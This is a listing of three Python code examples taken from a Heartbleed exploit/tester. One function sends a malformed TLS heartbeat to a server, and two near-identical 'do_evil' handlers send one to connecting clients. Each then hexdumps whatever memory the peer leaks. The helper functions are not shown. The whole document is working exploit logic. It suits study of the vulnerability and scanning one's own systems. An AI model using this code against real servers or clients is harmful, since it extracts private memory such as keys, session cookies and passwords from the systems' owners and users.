Example #1
0
def handle_ssl(sock, args, sslver='03 01'):
    # ClientHello
    sock.sendall(make_clienthello(sslver))

    # Skip ServerHello, Certificate, ServerKeyExchange, ServerHelloDone
    sslver = skip_server_handshake(sock, args.timeout)

    # Are you alive? Heartbeat please!
    try:
        sock.sendall(make_heartbeat(sslver, args.payload_len))
    except socket.error as e:
        print('Unable to send heartbeat! ' + str(e))
        return False

    try:
        memory = read_hb_response(sock, args.timeout)
        if memory is not None and not memory:
            print('Possibly not vulnerable')
            return False
        elif memory:
            print('Server returned {0} ({0:#x}) bytes'.format(len(memory)))
            hexdump(memory)
    except socket.error as e:
        print('Unable to read heartbeat response! ' + str(e))
        return False

    # "Maybe" vulnerable
    return True
Example #2
0
    def do_evil(self):
        '''Returns True if memory *may* be acquired'''
        # (2) HeartbeatRequest
        self.request.sendall(make_heartbeat(self.sslver, self.args.payload_len))

        # (3) Buggy OpenSSL will throw 0xffff bytes, fixed ones stay silent
        memory = read_hb_response(self.request, self.args.timeout)

        # If memory is None, then it is not vulnerable for sure. Otherwise, if
        # empty, then it *may* be invulnerable
        if memory is not None and not memory:
            print("Possibly not vulnerable")
            return False
        elif memory:
            print('Client returned {0} ({0:#x}) bytes'.format(len(memory)))
            hexdump(memory)

        return True
Example #3
0
    def do_evil(self):
        '''Returns True if memory *may* be acquired'''
        # (2) HeartbeatRequest
        self.request.sendall(make_heartbeat(self.sslver,
                                            self.args.payload_len))

        # (3) Buggy OpenSSL will throw 0xffff bytes, fixed ones stay silent
        memory = read_hb_response(self.request, self.args.timeout)

        # If memory is None, then it is not vulnerable for sure. Otherwise, if
        # empty, then it *may* be invulnerable
        if memory is not None and not memory:
            print("Possibly not vulnerable")
            return False
        elif memory:
            print('Client returned {0} ({0:#x}) bytes'.format(len(memory)))
            hexdump(memory)

        return True